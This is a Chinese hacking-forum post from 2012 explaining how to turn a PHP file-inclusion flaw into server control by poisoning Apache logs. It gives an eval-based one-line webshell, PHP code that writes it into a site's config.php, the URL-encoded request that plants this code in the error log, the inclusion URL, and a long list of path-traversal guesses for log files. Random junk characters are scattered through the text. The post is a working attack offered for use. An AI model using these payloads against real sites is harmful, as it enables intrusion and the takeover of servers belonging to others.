中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]
作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 & |7 N$ `0 \! ?) F) ~
% O/ q8 u: E4 T: V  |1 M
比如还是这句一句话木马
8 f! w1 S7 ]5 t. t, [9 W/ _<?eval($_POST[cmd]);?>   
5 f0 y& m$ X% w+ d
( {  a" y% W' W5 I/ _# K到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, . X5 S1 r4 X, h+ p% g
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 1 [2 P* L7 R8 Y7 o
5 f* z- Z4 l5 @/ B( {2 q+ w
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
# d* k0 K% y# B! e6 Afclose($fp);?>   //在config.php里写入一句木马语句 & T$ ?7 w7 {; M- M9 Y- h" z5 X
0 j' W( ?! q0 c- c
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 % \2 @2 o2 Z# v. j  ^8 S
转换为 2 j; j- m0 V) l' \( q7 @2 k/ Q7 Q# q
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F 9 j2 s# _8 W5 p% U. i
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp ) t8 e- p7 y: t) A0 M
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 0 K" r+ t# @" h" c6 T/ d6 l
fclose%28%24fp%29%3B%3F%3E
( O) S: j6 ^& Q4 f- ~* r7 Y) X我们提交
7 W+ S* y8 r& _0 P$ l' [" Vhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww $ D! H! R( o3 ^1 ?+ i0 C' D
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
1 f% ]. D, B) d6 O%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B * r- q- _! Z: Q! C- A5 L
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E   u  I7 g3 o; l2 w) X( y
, s$ |- ^9 M7 a# l- R$ M& S1 A8 |' @
这样就错误日志里就记录下了这行写入webshell的代码。
% m8 W& g& f! Y- @2 x( ]1 s我们再来包含日志,提交
. V) w) Z  q- l0 o/ A9 u! ihttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log : [2 }( |! k7 y8 k

  U6 B. g- a$ c这样webshell就写入成功了,config.php里就写入一句木马语句
( o6 ]8 R+ e5 K2 dOK.   f# U+ m: n/ n2 v
http://www.xxx.com/forum/config.php这个就成了我们的webshell
* ]( ]9 h# r* j( m9 ~, D, R直接用lanker的客户端一连,主机就是你的了。 0 A5 S( c7 C/ E+ i
' @5 p6 ~# S5 y% ?9 y: ^0 O$ U
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
! T' j7 K. t* u& v' h& I5 b% Y4 y2 i! L, X  G7 P2 F, ^
其他的日志路径,你可以去猜,也可以参照这里。
8 H8 r. ^, f4 k8 ]6 i; B../../../../../../../../../../var/log/httpd/access_log
8 @, S2 V) A6 q7 g../../../../../../../../../../var/log/httpd/error_log
. s2 w4 t3 d. E: a# S5 t../apache/logs/error.log
9 `4 q; y6 s3 d6 T# X, h../apache/logs/access.log
, c/ n& g8 Z+ ~  E: Y2 J../../apache/logs/error.log 5 J' S8 \+ Y7 l0 H# _! u
../../apache/logs/access.log 6 ?4 J; @( R9 B8 n: x
../../../apache/logs/error.log
/ ]( ^, E$ N2 L# ~../../../apache/logs/access.log " R, y5 t) T4 V; r4 D6 }
../../../../../../../../../../etc/httpd/logs/acces_log
$ b# c# |9 M* ^0 s../../../../../../../../../../etc/httpd/logs/acces.log ( W' q; R! {, ]3 H0 \5 [
../../../../../../../../../../etc/httpd/logs/error_log 1 J5 C2 s' f. X7 M7 c6 Y# f8 z
../../../../../../../../../../etc/httpd/logs/error.log 5 C4 N! B* Y) V  h- i/ l/ m% [
../../../../../../../../../../var/www/logs/access_log + U% ]% f! \% f' p$ ^  j4 a) o
../../../../../../../../../../var/www/logs/access.log
5 g* S* e5 l  O! W& o../../../../../../../../../../usr/local/apache/logs/access_log
: I3 A: }) f0 Y+ B4 |% [9 B7 k/ M../../../../../../../../../../usr/local/apache/logs/access.log / M8 l" I  A) Q: o
../../../../../../../../../../var/log/apache/access_log
) o! N- R+ D0 M2 C* T, U../../../../../../../../../../var/log/apache/access.log
! ]' U0 t, ~) }5 j) y; d../../../../../../../../../../var/log/access_log ; \/ Q* {1 l2 ~4 k, A2 o( T
../../../../../../../../../../var/www/logs/error_log
$ }; e/ F( p& }../../../../../../../../../../var/www/logs/error.log
8 t: e0 C" E/ i7 v9 n5 P; _../../../../../../../../../../usr/local/apache/logs/error_log
/ O6 Y- A) I( e4 [7 W../../../../../../../../../../usr/local/apache/logs/error.log
" {" N" d8 w+ i1 d; o8 F% D../../../../../../../../../../var/log/apache/error_log
; l" e7 X5 n: \' B% ^../../../../../../../../../../var/log/apache/error.log
1 e; x" D% r0 Z7 N% d. A, U5 M../../../../../../../../../../var/log/access_log ( b% `  a& q4 K5 l4 e$ U: x; C+ B
../../../../../../../../../../var/log/error_log
5 z7 f& p: h/ ^, ]; D- |/var/log/httpd/access_log       # B% X9 S( H8 Y
/var/log/httpd/error_log     
3 }; ?' _) a! z../apache/logs/error.log     ; p' J; d& b3 f0 Y
../apache/logs/access.log $ j' k2 Y3 r) H
../../apache/logs/error.log * l9 t9 E8 f, M  y
../../apache/logs/access.log ' M& {- q% s0 i+ R) `2 [$ ~4 F/ B
../../../apache/logs/error.log
- J, e# d' c2 `( |$ j5 Q../../../apache/logs/access.log
) [5 E, M2 y0 B! @: M6 ~  @% T  B/etc/httpd/logs/acces_log
6 E: U$ ^9 ]6 W" T+ U/etc/httpd/logs/acces.log ) w- {# m/ b" L- d  X5 `7 D
/etc/httpd/logs/error_log & p% Y& k! r8 p9 ?1 P; K4 j, u6 L
/etc/httpd/logs/error.log
) l( {- }) i4 N/var/www/logs/access_log   w* V, D" ]! n. W" M
/var/www/logs/access.log ( @3 E4 _" H# s" F$ g
/usr/local/apache/logs/access_log 6 m* y4 b! X$ |
/usr/local/apache/logs/access.log
/ K. r! U6 D, h6 z# ]+ B/var/log/apache/access_log 6 r* k* ]1 m7 l
/var/log/apache/access.log ; D5 d3 G8 E  l0 h' ]1 T0 A4 _
/var/log/access_log
" L/ W: i: D( ]! K' \9 j% G/var/www/logs/error_log
, a; t! ?( a1 p# p, Y/var/www/logs/error.log
- E- t, Y- f9 f6 U2 O0 i: u( O/usr/local/apache/logs/error_log # e0 f0 M# {/ A' W
/usr/local/apache/logs/error.log
9 |8 Y. S+ t; E& K/var/log/apache/error_log % ]. ?5 Y* y: [+ a* M$ I" ~6 k4 y9 z7 e
/var/log/apache/error.log
6 u3 G$ [/ c2 h3 e: N$ d/var/log/access_log
+ s/ x) p1 D1 c5 ?6 c/var/log/error_log



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2